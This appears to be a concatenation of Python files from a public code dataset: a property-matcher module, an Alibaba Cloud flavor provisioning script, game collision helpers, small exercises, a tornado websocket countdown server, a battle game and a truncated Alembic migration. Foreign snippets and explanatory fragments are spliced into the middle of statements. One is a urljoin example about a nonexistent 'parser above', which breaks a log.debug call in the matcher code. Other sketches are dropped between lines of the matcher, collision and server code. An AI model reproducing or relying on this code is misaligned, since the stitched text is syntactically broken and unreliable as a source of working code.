\"AnyMatcher\",\n \"one_of_each\": \"OneOfEachMatcher\",\n }\n\n @abstractmethod\n def match(self, data: object) -> bool:\n raise NotImplementedError\n\n\nclass PropertyMatcher(Matcher):\n class MatchFunctionType(Enum):\n direct = 0\n regex = \"regex\"\n contains = \"contains\"\n one_of = \"one_of\"\n older_than = \"older_than\"\n newer_than = \"newer_than\"\n\n def __init__(self, key: str, value: Any):\n self.match_type = self.MatchFunctionType.direct\n self.value: Any = value\n self.key = key\n self._fn = self._match_direct\n self.is_negation = False\n # handle special functions\n if type(self.value) == str:\n if self.value.startswith(\"!\"):\n self.is_negation = True\n self.value = self.value[1:]\n m = re.match(\n r\"({})\\((.*)\\)\".format(\"|\".join([t.value for t in self.MatchFunctionType if t.value])), self.value\n )\n if m:\n try:\n self.match_type = self.MatchFunctionType(m.group(1))\n except ValueError:\n log.debug(\n \"%s: unknown match function '%s' - treating as direct\", self.__class__.__name__, m.group(1)\n )\n if self.match_type == self.MatchFunctionType.regex:\n self.value = re.compile(m.group(2))\n self._fn = self._match_regex\n elif self.match_type == self.MatchFunctionType.contains:\n self.value = m.group(2)\n self._fn = self._match_contains\n elif self.match_type == self.MatchFunctionType.one_of:\n self.value = [s.strip() for s in m.group(2).split(\",\")]\n self._fn = self._match_one_of\n elif self.match_type == self.MatchFunctionType.older_than:\n self._value_from_ts(m.group(2))\n self._fn = self._match_older_than\n elif self.match_type == self.MatchFunctionType.newer_than:\n self._value_from_ts(m.group(2))\n self._fn = self._match_newer_than\n log.debug(\n \"%s: key: '%s' value: '%s' match_type: '%s' is_negation: '%s'\",\n self.__class__.__name__,\n self.key,\n self.value,\n self.match_type.value,\n self.is_negation,\n )\n\n def match(self, data: Any) -> bool:\n log.debug(\"%s: matching key: '%s', data: '%s'\", 
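# The parser above is Python 2 (import urlparse); in Python 3 the same
# relative-link resolution lives in urllib.parse:
from urllib.parse import urljoin

assert urljoin("http://www.appzapp.us/apps/", "../detail/123") == "http://www.appzapp.us/detail/123"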
self.__class__.__name__, self.key, str(data))\n # handle special properties\n if self.key == \"label\" and hasattr(data, \"has_label\"):\n log.debug(\"%s: matching label\", self.__class__.__name__)\n return self._match_label(data) ^ self.is_negation\n\n key_path = self.key.split(\".\")\n obj = data\n k = self.key # to make linters happy\n while key_path:\n k = key_path.pop(0)\n log.debug(\"%s: matching k: '%s', obj: '%s'\", self.__class__.__name__, k, str(obj))\n if obj is None:\n return False\n if hasattr(obj, k):\n obj = getattr(obj, k)\n else:\n try:\n obj = obj[k] # type: ignore\n except (KeyError, TypeError):\n log.debug(\"%s: object: does not have property '%s'\", self.__class__.__name__, self.key)\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, False)\n return False\n if isinstance(obj, Enum):\n v = obj.value\n else:\n v = obj\n log.debug(\n \"%s: matching '%s' '%s': '%s', value: '%s'\", self.__class__.__name__, k, self.match_type.name, self.value, v\n )\n ret = self._fn(v) ^ self.is_negation\n log.debug(\"%s: ret %s\", self.__class__.__name__, ret)\n return ret\n\n def _match_label(self, obj: Any) -> bool:\n if self.match_type == self.MatchFunctionType.direct:\n ret = obj.has_label(self.value) # type: ignore\n elif self.match_type == self.MatchFunctionType.one_of:\n ret = any(obj.has_label(label) for label in self.value)\n else:\n log.error(\n \"'%s' function is not supported for matching attribute 'label' of '%s'\",\n self.match_type.name,\n obj.__class__.__name__,\n )\n ret = self.is_negation\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, ret)\n return ret\n\n def _match_direct(self, obj: Any) -> bool:\n return str(obj) == str(self.value)\n\n def _match_regex(self, obj: Any) -> bool:\n # noinspection PyUnresolvedReferences\n return self.value.match(str(obj)) is not None\n\n def _match_contains(self, obj: Any) -> bool:\n if type(obj) == str:\n return self.value in obj\n if hasattr(obj, \"__iter__\"):\n log.debug(\"%s: '%s' is iterable\", self.__class__.__name__, obj)\n return self.value in [str(x) for x in obj]\n else:\n return self.value == obj or str(self.value) == str(obj)\n\n def _match_one_of(self, obj: Any) -> bool:\n return any(str(obj) == v for v in self.value)\n\n def _match_older_than(self, obj: Any) -> bool:\n if not self.value:\n # config had invalid time specification, nothing can match\n return False\n ts = self._ts_from_string(str(obj))\n if not ts:\n log.error(\"%s: Cannot parse time: '%s'\", self.__class__.__name__, str(obj))\n return self.is_negation\n else:\n return ts < self.value # type:ignore\n\n def _match_newer_than(self, obj: Any) -> bool:\n if not self.value:\n # config had invalid time specification, nothing can match\n return False\n ts = self._ts_from_string(str(obj))\n if not ts:\n log.error(\"%s: Cannot parse time: '%s'\", self.__class__.__name__, str(obj))\n return self.is_negation\n else:\n return ts > self.value # type:ignore\n\n @staticmethod\n def _interval_from_string(s: str) -> Optional[timedelta]:\n NUMBER = r\"-?\\d+(?:\\.\\d+)?\"\n UNITS = {\n \"weeks\": r\"w(?:eek(:?s)?)?\",\n \"days\": r\"d(?:ay(?:s)?)?\",\n \"hours\": r\"h(?:our(:?s)?)?\",\n \"minutes\": r\"m(?:in(?:ute)?(:?s?))?\",\n \"seconds\": r\"s(?:ec(?:ond)?(:?s)?)?\",\n \"milliseconds\": r\"m(?:illi)?s(?:ec(?:ond)?(:?s)?)?\",\n \"microseconds\": r\"(?:u|micro)s(?:ec(?:ond)?(:?s)?)?\",\n }\n for unit, unit_exp in UNITS.items():\n m = re.fullmatch(f\"({NUMBER})\\\\s*{unit_exp}\", s)\n if m:\n try:\n number = float(m.groups()[0])\n except ValueError:\n return None\n 
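A simplified sketch of the _interval_from_string idea above: map a "<number><unit>" string to a datetime.timedelta. The unit patterns here are abbreviated stand-ins for the module's fuller UNITS table, shown only to illustrate the approach.

# Simplified unit table; the real UNITS regexes accept longer spellings.
import re
from datetime import timedelta

UNITS = {"weeks": r"w", "days": r"d", "hours": r"h", "minutes": r"min", "seconds": r"s"}

def interval_from_string(s):
    for unit, unit_exp in UNITS.items():
        m = re.fullmatch(r"(-?\d+(?:\.\d+)?)\s*" + unit_exp, s)
        if m:
            return timedelta(**{unit: float(m.group(1))})
    return None

print(interval_from_string("3d"))     # 3 days, 0:00:00
print(interval_from_string("1.5h"))   # 1:30:00
print(interval_from_string("bogus"))  # None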
return timedelta(**{unit: number})\n return None\n\n @staticmethod\n def _ts_from_string(s: str) -> Optional[datetime]:\n try:\n return datetime.fromisoformat(s)\n except ValueError:\n pass\n if s.endswith(\"Z\"):\n try:\n return datetime.fromisoformat(s.replace(\"Z\", \"+00:00\").replace(\"T\", \" \"))\n except ValueError:\n return None\n else:\n return None\n\n def _value_from_ts(self, arg: str) -> None:\n if arg == \"now\":\n self.value = datetime.now(tz=timezone.utc)\n elif arg == \"today\":\n self.value = datetime.now(tz=timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)\n elif arg == \"yesterday\":\n self.value = datetime.now(tz=timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0) - timedelta(\n days=1\n )\n elif arg == \"tomorrow\":\n self.value = datetime.now(tz=timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0) + timedelta(\n days=1\n )\n else:\n delta = self._interval_from_string(arg)\n if delta:\n self.value = datetime.now(tz=timezone.utc) + delta\n else:\n try:\n self.value = datetime.fromisoformat(arg)\n if not self.value.tzinfo:\n log.debug(\"Setting timezone to UTC for match time '%s'\", self.value.isoformat())\n self.value = self.value.replace(tzinfo=timezone.utc)\n except ValueError as exc:\n log.error(\"%s: Invalid time specification: %s\", self.__class__.__name__, arg)\n self.value = None\n\n\nclass SetMatcher(Matcher):\n def __init__(\n self,\n data: List[Dict[str, Any]],\n max_matches: Optional[int] = None,\n ):\n self.matchers = []\n self.max_matches: Optional[int] = max_matches\n self._done = False\n if type(data) != list:\n raise RuntimeError(f\"Invalid match specification: {data}\")\n for e in data:\n if type(e) != dict:\n raise RuntimeError(f\"Invalid match specification: {data}\")\n for k, v in e.items():\n if k in self.SPECIAL:\n matcher = getattr(sys.modules[__name__], self.SPECIAL[k])(v)\n else:\n matcher = PropertyMatcher(k, v)\n self.matchers.append(matcher)\n log.debug(\"%s: %d matchers, max_matches: %s\", self.__class__.__name__, len(self.matchers), self.max_matches)\n\n def match(self, data: object) -> bool:\n if self._done:\n return False\n if self.max_matches is not None and self.max_matches == 0:\n log.debug(\"%s: match limit reached\", self.__class__.__name__)\n self._done = True\n return False\n return self.do_match(data)\n\n @abstractmethod\n def do_match(self, data: object) -> bool:\n raise NotImplementedError\n\n\nclass AllMatcher(SetMatcher):\n def do_match(self, data: object) -> bool:\n for m in self.matchers:\n if not m.match(data):\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, False)\n return False\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, True)\n if self.max_matches is not None:\n self.max_matches -= 1\n return True\n\n\nclass AnyMatcher(SetMatcher):\n def do_match(self, data: object) -> bool:\n if not self.matchers:\n log.debug(\"%s: no matchers: ret '%s'\", self.__class__.__name__, True)\n if self.max_matches is not None:\n self.max_matches -= 1\n return True\n for m in self.matchers:\n if m.match(data):\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, True)\n if self.max_matches is not None:\n self.max_matches -= 1\n return True\n log.debug(\"%s: ret '%s'\", self.__class__.__name__, False)\n return False\n\n\nclass OneOfEachMatcher(Matcher):\n def __init__(self, data: Dict[str, List]):\n self.match_vector = data.keys()\n self.match_set = set([tuple(x) for x in product(*[data[k] for k in self.match_vector])])\n log.debug(\n \"%s: match_set: '%s'\",\n 
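The OneOfEachMatcher defined just below builds the cartesian product of the allowed values and ticks combinations off as matching records arrive. A dependency-free sketch with hypothetical spec and records:

# Each combination in the product may match at most once.
from itertools import product

spec = {"family": ["ip", "hostname"], "period": [60, 300]}
match_vector = list(spec.keys())
match_set = set(product(*[spec[k] for k in match_vector]))

records = [{"family": "ip", "period": 60},
           {"family": "ip", "period": 60},            # duplicate combination
           {"family": "hostname", "period": 300}]

for r in records:
    key = tuple(r[k] for k in match_vector)
    matched = key in match_set
    match_set.discard(key)
    print(key, "->", matched)
# ('ip', 60) -> True ; ('ip', 60) -> False ; ('hostname', 300) -> True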
self.__class__.__name__,\n            \", \".join(\"|\".join(str(e) for e in x) for x in self.match_set),\n        )\n\n    def match(self, data: Any) -> bool:\n        if not self.match_set:\n            log.debug(\"%s: match set is empty\", self.__class__.__name__)\n            return False\n        m = tuple(data[k] for k in self.match_vector)\n        log.debug(\"%s: matching: '%s'\", self.__class__.__name__, \"|\".join(str(x) for x in m))\n        if m in self.match_set:\n            self.match_set.remove(m)\n            log.debug(\"%s: remaining %d in match_set\", self.__class__.__name__, len(self.match_set))\n            ret = True\n        else:\n            ret = False\n        log.debug(\"%s: ret '%s'\", self.__class__.__name__, ret)\n        return ret\n\n\ndef all_matcher_from_rules(rules: List[str]) -> AllMatcher:\n    log.debug(\"rules: '%s'\", rules)\n    matchers: List[Dict] = []\n    for r in rules:\n        parts = r.split(\":\", maxsplit=1)\n        if len(parts) != 2:\n            fail(f\"Invalid match spec: {r} (must have format: '<property>:<value>')\")\n        matchers.append({parts[0]: parts[1]})\n    return AllMatcher(matchers)\n","repo_name":"kentik/synth_tools","sub_path":"synth_tools/matchers.py","file_name":"matchers.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35399703688","text":"#!/usr/bin/env python3\n\"\"\"\nProvision the flavor data for avocado-cloud testing.\nMaintainer: Charles Shih \n\"\"\"\n\nimport argparse\nimport logging\nimport json\nimport subprocess\n\nLOG = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')\n\nARG_PARSER = argparse.ArgumentParser(\n    description=\"Provision the flavor data for avocado-cloud testing.\")\nARG_PARSER.add_argument(\n    '--file',\n    dest='file',\n    action='store',\n    help='The file to be provisioned.',\n    default='./alibaba_flavors.yaml',\n    required=False)\nARG_PARSER.add_argument(\n    '--flavor',\n    dest='flavor',\n    action='store',\n    help='Type of instance to test.',\n    required=True)\n\nARGS = ARG_PARSER.parse_args()\n\nUTILS_PATH = './utils'\nTEMPLATE_PATH = './templates'\n\n\ndef aliyun_cli(cmd):\n    LOG.debug(f'Aliyun CLI: {cmd}')\n\n\ndef query_spec(flavor):\n    \"\"\"Query instance SPEC.\"\"\"\n\n    cmd = 'aliyun ecs DescribeInstanceTypes --InstanceTypes.1 ' + flavor\n    p = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)\n    if p.returncode != 0:\n        LOG.error(p.stdout)\n        return None\n\n    _data = json.loads(p.stdout)\n    specs = _data.get('InstanceTypes', {}).get('InstanceType', [])\n\n    for spec in specs:\n        if spec.get('InstanceTypeId') == flavor:\n            return spec\n\n    return None\n\n\ndef extract_info(spec):\n    \"\"\"Extract information from the instance SPEC.\"\"\"\n\n    info = {}\n    info['name'] = spec.get('InstanceTypeId')\n    info['cpu'] = spec.get('CpuCoreCount')\n    info['memory'] = spec.get('MemorySize')\n    info['nic_count'] = spec.get('EniQuantity')\n    info['disk_quantity'] = spec.get('DiskQuantity')\n    info['private_ip_quantity'] = spec.get('EniPrivateIpAddressQuantity')\n\n    if spec.get('LocalStorageAmount'):\n        info['disk_count'] = spec.get('LocalStorageAmount')\n        info['disk_size'] = spec.get('LocalStorageCapacity')\n        info['disk_type'] = spec.get('LocalStorageCategory')\n\n    # Some special families use NVMe driver for local disks\n    _families = ['ecs.i3', 'ecs.i3g', 'ecs.i4', 'ecs.i4g', 'ecs.d3s']\n    if spec.get('InstanceTypeFamily') in _families:\n        info['local_disk_driver'] = 'nvme'\n    else:\n        info['local_disk_driver'] = 'virtio_blk'\n\n    # Some special families use NVMe driver for cloud disks\n    _families = ['ecs.g7se', 'ecs.ebmg7se', 'ecs.g8y', 'ecs.c8y', 
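How "key:value" CLI rules become the list-of-dicts spec that all_matcher_from_rules (above) hands to AllMatcher; the rule strings here are hypothetical.

rules = ["type:ip", "name:regex(^prod-.*)"]
matchers = []
for r in rules:
    parts = r.split(":", maxsplit=1)
    assert len(parts) == 2, f"Invalid match spec: {r}"
    matchers.append({parts[0]: parts[1]})
print(matchers)   # [{'type': 'ip'}, {'name': 'regex(^prod-.*)'}]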
'ecs.r8y', 'ecs.g8i', 'ecs.c8i', 'ecs.r8i', \\\n                 'ecs.g8a', 'ecs.g8ae']\n    if spec.get('InstanceTypeFamily') in _families:\n        info['cloud_disk_driver'] = 'nvme'\n    else:\n        info['cloud_disk_driver'] = 'virtio_blk'\n\n    # Some security-enhanced instance families have 50% encrypted memory\n    _families = ['ecs.c7t', 'ecs.g7t', 'ecs.r7t']\n    if spec.get('InstanceTypeFamily') in _families:\n        info['memory'] = int(info['memory'] * 0.5)\n\n    _families = ['ecs.ebmg6a', 'ecs.ebmc6a', 'ecs.ebmr6a', 'ecs.ebmg7a', 'ecs.ebmc7a', 'ecs.ebmr7a', \\\n                 'ecs.g6t', 'ecs.c6t', 'ecs.r6t', 'ecs.g7t', 'ecs.c7t', 'ecs.r7t']\n    if spec.get('InstanceTypeFamily') in _families:\n        info['boot_mode'] = 'uefi'\n    else:\n        info['boot_mode'] = 'bios'\n\n    _families = ['ecs.g6r', 'ecs.c6r', 'ecs.g8y', 'ecs.c8y', 'ecs.r8y']\n    if spec.get('InstanceTypeFamily') in _families:\n        info['arch'] = 'aarch64'\n    else:\n        info['arch'] = 'x86_64'\n\n    return info\n\n\ndef compile_file(info):\n    \"\"\"Compile the data file.\"\"\"\n\n    lines = []\n    lines.append('Flavor: !mux\\n')\n    lines.append('\\n')\n    lines.append('    {}:\\n'.format(info.get('name')))\n\n    for k, v in info.items():\n        lines.append(f'        {k}: {v}\\n')\n\n    return lines\n\n\ndef dump_file(file, lines):\n    \"\"\"Dump the data file.\"\"\"\n\n    with open(file, 'w') as f:\n        f.writelines(lines)\n\n\nif __name__ == '__main__':\n\n    # Query flavor SPEC\n    spec = query_spec(ARGS.flavor)\n\n    if not spec:\n        LOG.error(f'Unable to query SPEC for flavor \"{ARGS.flavor}\".')\n        exit(1)\n\n    # Analyse SPEC\n    info = extract_info(spec)\n\n    if not info:\n        LOG.error(f'Unable to analyse SPEC for flavor \"{ARGS.flavor}\".')\n        exit(1)\n\n    # Compile data file\n    lines = compile_file(info)\n\n    # Dump the data file\n    dump_file(ARGS.file, lines)\n\n    exit(0)\n","repo_name":"virt-s1/avocado-cloud-scheduler","sub_path":"utils/provision_flavor_data.py","file_name":"provision_flavor_data.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36099768202","text":"# coding: cp949\ndef collisionIntersectRect(_object1, _object2):\n    # left, top, right, bottom\n    object1_x1, object1_y1, object1_x2, object1_y2 = _object1.getCollisionBox()\n    object2_x1, object2_y1, object2_x2, object2_y2 = _object2.getCollisionBox()\n    object3_x1, object3_y1, object3_x2, object3_y2 = 0, 0, 0, 0\n\n    if (object1_y1 <= object2_y2) and (object1_x2 >= object2_x1) \\\n        and (object1_x1 <= object2_x2) and (object1_y2 >= object2_y1):\n        #top\n        if object1_y1 > object2_y1:\n            object3_y1 = object1_y1\n        elif object1_y1 <= object2_y1:\n            object3_y1 = object2_y1\n        #bottom\n        if object1_y2 < object2_y2:\n            object3_y2 = object1_y2\n        elif object1_y2 >= object2_y2:\n            object3_y2 = object2_y2\n        #right\n        if object1_x2 < object2_x2:\n            object3_x2 = object1_x2\n        elif object1_x2 >= object2_x2:\n            object3_x2 = object2_x2\n        #left\n        if object1_x1 > object2_x1:\n            object3_x1 = object1_x1\n        elif object1_x1 <= object2_x1:\n            object3_x1 = object2_x1\n        return True, object3_x1, object3_y1, object3_x2, object3_y2\n    return False, object3_x1, object3_y1, object3_x2, object3_y2\n\ndef collisionPtInRect(_object, _x, _y):\n    if (_object.X - (int)(_object.sizeX / 2) <= _x) and (_object.X + (int)(_object.sizeX / 2) >= _x):\n        if (_object.Y - (int)(_object.sizeY / 2) <= _y) and (_object.Y + (int)(_object.sizeY / 2) >= _y):\n            return True\n    return False\n\ndef collisionAABB(_mainObject, _subObject, _left, _top, _right, _bottom):\n    if (_right - _left) > (_bottom - _top):\n        if _mainObject.Y > _subObject.Y:\n            _mainObject.Y += 
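The branch ladders in collisionIntersectRect above reduce to max() on the top-left corner and min() on the bottom-right corner; a compact standalone version:

# Overlap rectangle of two (left, top, right, bottom) boxes, y pointing down.
def intersect(r1, r2):
    x1, y1 = max(r1[0], r2[0]), max(r1[1], r2[1])
    x2, y2 = min(r1[2], r2[2]), min(r1[3], r2[3])
    if x1 <= x2 and y1 <= y2:
        return True, (x1, y1, x2, y2)
    return False, None

print(intersect((0, 0, 10, 10), (5, 5, 20, 20)))   # (True, (5, 5, 10, 10))
print(intersect((0, 0, 2, 2), (5, 5, 6, 6)))       # (False, None)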
(_bottom - _top)\n        else:\n            _mainObject.Y -= (_bottom - _top)\n    else:\n        if _mainObject.X > _subObject.X:\n            _mainObject.X += (_right - _left)\n        else:\n            _mainObject.X -= (_right - _left)\n\ndef collisionMiniIntersectRect(_object1, _object2):\n    object1_x1, object1_y1, object1_x2, object1_y2 = _object1.getCollisionBox()\n    object2_x1, object2_y1, object2_x2, object2_y2 = _object2.getCollisionBox()\n\n    if object1_x1 > object2_x2: return False\n    if object1_x2 < object2_x1: return False\n    if object1_y2 < object2_y1: return False\n    if object1_y1 > object2_y2: return False\n\n    return True","repo_name":"RYUHYEONGSEOK/RHS","sub_path":"CrazyArcade_Packaging/Manager_Collision.py","file_name":"Manager_Collision.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4623604762","text":"x = float(input(\"How many kg of apples do you want to buy? \"))\ny = float(input(\"How many kg of strawberries do you want to buy? \"))\nz = x+y\nvr = (x*1.8)+(y*2.5)\nif z > 8 or vr > 25:\n    d = (10*vr)/100\n    vr = vr - d\n    print(\"You bought more than 8 kilos of fruit or spent over R$ 25 and got a 10% discount\")\n    print(\"You got\", d, \"reais of discount, paying in the end R$\", vr)\n\nelse:\n    print(\"The total of your purchase is R$\", vr)\n","repo_name":"Davi-Augusto-Schmidt/Programas-e-exercicios","sub_path":"Python/2 - Estrutura de Decisão/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39218069828","text":"import random\n\ndef func(spis, N):\n    rand_list = []\n    for i in range(0,N):\n        k = random.randint(0, len(spis)-1)\n        rand_list.append(spis[k])\n    return rand_list\n\ndef func_max_slov(name_list,rn_list):\n    dict_slov = {}\n    for nm in name_list:\n        dict_slov[nm] = rn_list.count(nm)\n    list_txt = list(dict_slov.items())\n    list_txt.sort(key=lambda i: i[1])\n    list_txt.reverse()\n    return list_txt[:1]\n\ndef func_min_symb(rn_list):\n    dict_symb = {}\n    for i in range(len(rn_list)):\n        dict_symb[rn_list[i][0]] = 0\n    for i in range(len(rn_list)):\n        dict_symb[rn_list[i][0]] += 1\n\n    list_symb = list(dict_symb.items())\n    list_symb.sort(key=lambda i: i[1])\n\n    return list_symb[:1]\n\nlist_name = ['Iren','Andrew','Kate','Jim']\nrn_list = func(list_name,10)\nprint(rn_list)\n\nprint(func_max_slov(list_name,rn_list))\n\nprint(func_min_symb(rn_list))\n\n","repo_name":"goraci0/Lesson-4","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33797270770","text":"import sys\nimport time\nimport os\nimport signal\nimport logging\n\nfrom clint.textui import puts, colored\n\ntry:\n    import tornado.httpserver\n    import tornado.ioloop\n    import tornado.web\n    import tornado.options\n    import tornado.websocket\nexcept ImportError:\n    puts(colored.red('Module tornado not found, use: pip install tornado'))\n    sys.exit(1)\n\nserver = None\ncountdown_time = 300\ncountdown_code = 300\ncountdown_state = 'resume'\nws_clients = []\nTEMPLATE_DIR = os.path.join(os.path.dirname(__file__), \"templates\")\nSTATIC_DIR = os.path.join(os.path.dirname(__file__), \"static\")\nFORMAT = \"[%(asctime)-15s] - %(message)s\"\nlogging.basicConfig(format=FORMAT)\n\n\nclass MainHandler(tornado.web.RequestHandler):\n    def get(self):\n        self.render('index.html')\n\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n\n    
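A dependency-free sketch of the resume/pause toggle and broadcast loop that WSHandler implements below; FakeSocket stands in for connected tornado websocket clients.

# No tornado needed: the toggle is plain state, broadcast is a loop.
class FakeSocket:
    def __init__(self, name): self.name = name
    def write_message(self, msg): print(f"{self.name} <- {msg}")

ws_clients = [FakeSocket("a"), FakeSocket("b")]
countdown_state = "resume"

def on_message(message):
    global countdown_state
    if message == "resume_pause":
        countdown_state = "pause" if countdown_state == "resume" else "resume"
        for s in ws_clients:          # broadcast the new state to everyone
            s.write_message(countdown_state)

on_message("resume_pause")   # a <- pause ; b <- pause
on_message("resume_pause")   # a <- resume ; b <- resume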
def open(self):\n        logging.info('[ws] connected: {0}'.format(self.request.remote_ip))\n        ws_clients.append(self)\n\n    def on_message(self, message):\n        global countdown_state\n        global countdown_code\n        global countdown_time\n        logging.info('[ws] message received: {0}'.format(message))\n        if message == 'resume_pause':\n            if countdown_state == 'resume':\n                countdown_state = 'pause'\n            elif countdown_state == 'pause':\n                countdown_state = 'resume'\n            self.broadcast(countdown_state)\n        elif message == 'restart':\n            countdown_code = countdown_time\n        else:\n            self.broadcast(message)\n\n    def broadcast(self, message):\n        global ws_clients\n        for socket in ws_clients:\n            socket.write_message(message)\n\n    def on_close(self):\n        logging.info('[ws] disconnected: {0}'.format(self.request.remote_ip))\n        ws_clients.remove(self)\n\n\napplication = tornado.web.Application([\n    (r'/', MainHandler),\n    (r'/ws', WSHandler),\n], template_path=TEMPLATE_DIR, static_path=STATIC_DIR, debug=True)\n\n\ndef sig_handler(sig, frame):\n    tornado.ioloop.IOLoop.instance().add_callback(shutdown)\n\n\ndef shutdown():\n    logging.info('Stopping http server')\n    server.stop()\n    io_loop = tornado.ioloop.IOLoop.instance()\n    io_loop.stop()\n    logging.info('Shutdown')\n\n\ndef countdown():\n    global countdown_code\n    global countdown_time\n    global ws_clients\n    ioloop = tornado.ioloop.IOLoop.current()\n    if countdown_state == 'resume':\n        if ws_clients:\n            str_time = time.strftime('%M:%S', time.gmtime(countdown_code))\n            for s in ws_clients:\n                s.write_message(str_time)\n            if countdown_code:\n                countdown_code -= 1\n            else:\n                countdown_code = countdown_time\n    ioloop.add_timeout(time.time() + 1, countdown)\n\n\ndef main(port=2020, code_time=300):\n    global server\n    global countdown_time\n    tornado.options.parse_command_line()\n    server = tornado.httpserver.HTTPServer(application)\n    server.listen(port)\n    signal.signal(signal.SIGTERM, sig_handler)\n    signal.signal(signal.SIGINT, sig_handler)\n    logging.info('Server running on port %d' % port)\n    logging.info('WebSocket: ws://localhost:%d/ws' % port)\n    countdown_time = code_time\n    countdown()\n    tornado.ioloop.IOLoop.instance().start()\n    logging.info(\"Exit...\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"fabiocerqueira/easydojo","sub_path":"easydojo/panel/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"70190512374","text":"import random\nimport math\n\nclass Warrior:\n    def __init__(self, name=\"Warrior\", health=0, attMax=0, blockMax=0):\n        self.name = name\n        self.health = health\n        self.attMax = attMax\n        self.blockMax = blockMax\n\n    def attack(self):\n        attAmt = self.attMax * (random.random() + .5)\n\n        return attAmt\n\n    def block(self):\n        blockAmt = self.blockMax * (random.random() + .5)\n\n        return blockAmt\n\nclass Battle:\n    def startFight(self, warrior1, warrior2):\n        while True:\n            if self.getAttackResult(warrior1, warrior2) == \"Game Over\":\n                print(\"Game Over\")\n                break\n            if self.getAttackResult(warrior2, warrior1) == \"Game Over\":\n                print(\"Game Over\")\n                break\n\n    @staticmethod\n    def getAttackResult(warriorA, warriorB):\n        warriorAAttAmt = warriorA.attack()\n        warriorBBlockAmt = warriorB.block()\n\n        damage2warriorB = math.ceil(warriorAAttAmt - warriorBBlockAmt)\n\n        warriorB.health = warriorB.health - damage2warriorB\n        print(\"{} attacks {} and inflicts {} damage\".format(warriorA.name, warriorB.name, damage2warriorB))\n        print(\"{} is down to {} 
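attack() and block() above scale attMax/blockMax by random.random() + .5, i.e. a uniform draw in [0.5, 1.5); a quick empirical check that the mean equals attMax:

import random

random.seed(0)
att_max = 20
samples = [att_max * (random.random() + .5) for _ in range(100_000)]
print(min(samples) >= 10, max(samples) < 30)   # True True
print(round(sum(samples) / len(samples), 1))   # ~20.0: the mean is attMax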
health\".format(warriorB.name, warriorB.health))\n if warriorB.health <= 0:\n print(\"{} has died and {} is Victorious\".format(warriorB.name, warriorA.name))\n return \"Game Over\"\n else:\n return \"Fight Again\"\n\ndef main():\n maximus = Warrior(\"Maximus\", 50, 20, 10)\n galaxon = Warrior(\"Galaxon\", 50, 20, 10)\n\n battle = Battle()\n\n battle.startFight(maximus, galaxon)\n\nmain()","repo_name":"aoko-code/Python","sub_path":"oop/warGame.py","file_name":"warGame.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22746185873","text":"\"\"\"create_tables\n\nRevision ID: 18083b656fc0\nRevises: \nCreate Date: 2019-12-15 18:32:53.036743\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '18083b656fc0'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('slack_workspaces',\n sa.Column('id', sa.String(length=64), nullable=False, comment='Workspace ID'),\n sa.Column('name', sa.String(length=128), nullable=False, comment='Workspace Name'),\n sa.Column('domain', sa.String(length=64), nullable=False, comment='Workspace Domain'),\n sa.Column('email_domain', sa.String(length=64), nullable=True, comment='Workspace Domain'),\n sa.Column('image_34', sa.Text(), nullable=False, comment='Avatar Icon(34)'),\n sa.Column('image_44', sa.Text(), nullable=False, comment='Avatar Icon(44)'),\n sa.Column('image_68', sa.Text(), nullable=False, comment='Avatar Icon(68)'),\n sa.Column('image_88', sa.Text(), nullable=False, comment='Avatar Icon(88)'),\n sa.Column('image_102', sa.Text(), nullable=False, comment='Avatar Icon(102)'),\n sa.Column('image_132', sa.Text(), nullable=False, comment='Avatar Icon(132)'),\n sa.Column('api_token', sa.Text(), nullable=False, comment='API Token'),\n sa.Column('active_flag', sa.Text(), nullable=False, comment='Crawler Active Flag'),\n sa.Column('delete_flag', sa.Boolean(), nullable=False, comment='Delete flag'),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP'), nullable=False),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('slack_channels',\n sa.Column('id', sa.String(length=128), nullable=False, comment='Primary Key({team_id}/{channel_id})'),\n sa.Column('local_id', sa.String(length=64), nullable=True, comment='Channel ID'),\n sa.Column('team_id', sa.String(length=64), nullable=True, comment='Workspace ID'),\n sa.Column('name', sa.String(length=128), nullable=False, comment='Channel Name'),\n sa.Column('created', sa.DateTime(), nullable=False, comment='Channel Create Datetime'),\n sa.Column('topic', sa.Text(), nullable=True, comment='Channel Topic'),\n sa.Column('purpose', sa.Text(), nullable=True, comment='Channel Purpose'),\n sa.Column('created_at', sa.DateTime(), 